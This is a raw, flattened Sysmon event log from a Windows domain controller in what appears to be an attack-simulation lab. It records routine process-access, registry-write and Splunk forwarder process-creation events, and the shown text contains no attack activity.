14:08:49.482{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.482{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9671-6005-8005-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.482{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9671-6005-8005-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.483{59A5CD1D-9671-6005-8005-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000019218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:08:51.654{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda3-0x72dcf76a) 13241300x800000000000000019228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD 
(0x00000008) 13241300x800000000000000019227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002031b3) 13241300x800000000000000019226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed9b-0x161d2825) 13241300x800000000000000019225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda3-0x77e19025) 13241300x800000000000000019224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edab-0xd9a5f825) 13241300x800000000000000019223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000019222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002031b3) 13241300x800000000000000019221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed9b-0x161d2825) 13241300x800000000000000019220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda3-0x77e19025) 13241300x800000000000000019219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:00.216{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edab-0xd9a5f825) 10341000x800000000000000019230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:19.075{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:19.075{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000019231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:23.981{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000019234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:32.297{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x800000000000000019233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:32.297{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x800000000000000019232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:09:32.297{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 10341000x800000000000000019242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96A8-6005-8105-00000000A301}6980C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:44.574{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:44.574{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-96A8-6005-8105-00000000A301}6980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96A8-6005-8105-00000000A301}6980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:44.574{59A5CD1D-96A8-6005-8105-00000000A301}6980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.574{59A5CD1D-96A9-6005-8205-00000000A301}45526732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96A9-6005-8205-00000000A301}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:45.417{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:45.417{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-96A9-6005-8205-00000000A301}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.417{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96A9-6005-8205-00000000A301}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:45.418{59A5CD1D-96A9-6005-8205-00000000A301}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.917{59A5CD1D-96AA-6005-8405-00000000A301}29606040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 